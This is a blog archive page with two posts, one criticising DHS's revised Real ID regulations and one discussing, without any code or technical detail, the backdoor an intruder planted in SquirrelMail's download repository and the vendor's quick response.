Blog Archives

DHS issues revised “Real ID” regulations

The Department of Homeland Security has released revised “Real ID” regulations — 284 pages long. While according to government jargon these are the “final” regulations, the first deadline for compliance has now been pushed back to December 31, 2009, so there’s still plenty of opportunity for Congress to act and change things.

Their press release now spins the system as “preventing document fraud”, and talks more about the costs of identity theft than it does about terrorism — pretty amusing in light of Privacy Rights Clearinghouse’s Real ID Act will increase exposure to identity theft. It also trumpets substantial cost savings, which it attributes primarily to revisions giving the states “greater flexibility in issuing licenses to older Americans”. Flexibility is a good thing, but it’ll be interesting to see what new holes they’ve introduced for terrorists and identity thieves to exploit.

I’ve blogged in the past on this issue on the Stop “Real ID” Now! blog, and will be updating it with links to analyses from the press and civil liberties organizations as they come out.


Comments Off on DHS issues revised “Real ID” regulations


Poisoning squirrels in the repository

Slashdot’s linked to a bunch of good stories on computer security recently. Squirrelmail repository poisoned has the catchiest title, and plus it’s about squirrels, so it goes first.

What happened was that an intruder got into the site where you download Squirrelmail, and introduced a very subtle change in the code that would allow somebody who know about it (the intruder or anybody he/she told or sold the secret to) to “an arbitrary code execution risk” aka “pwning” both of which are security speak for “doing whatever you want to on the system”.

YOW! Dreamhost, my ISP, provides a nice one-click install for Squirrelmail (“webmail for nuts!”) and I use it on a couple of my domains. Maybe somebody’s used this to hack in — and that’s why my colors keep intermittently changing from pink to blue! Hmm, well, probably not … although other than the unsatisfyingly generic “intermittent software bug” it’s the best explanation so far.

Imagine, though, that this was a political candidate’s blog; and that the hack gets exploited to delete a random 10% of mail from potential supporters and voters. This might not get noticed for a while … and if it went on long enough, it could easily lead to enough impact to swing a close election. Or suppose there’s a mass-mailing from the account to everybody in the district the day before the election: “This account has been hacked, can you really trust this bozo?” Hmm. Talk about your social engineering attacks.

It’s also another interesting example of the “security as a social science ” theme — and more specifically, the process issues for web services that came up in How’d that get through QA? Something that’s really encouraging here is that in both cases the software providers did exactly the right thing here, including being transparent about what had happened — Squirrelmail’s blog shows how quickly they reacted, announcing immediately and getting the fix out within a day.

social computing
social sciences

Comments Off on Poisoning squirrels in the repository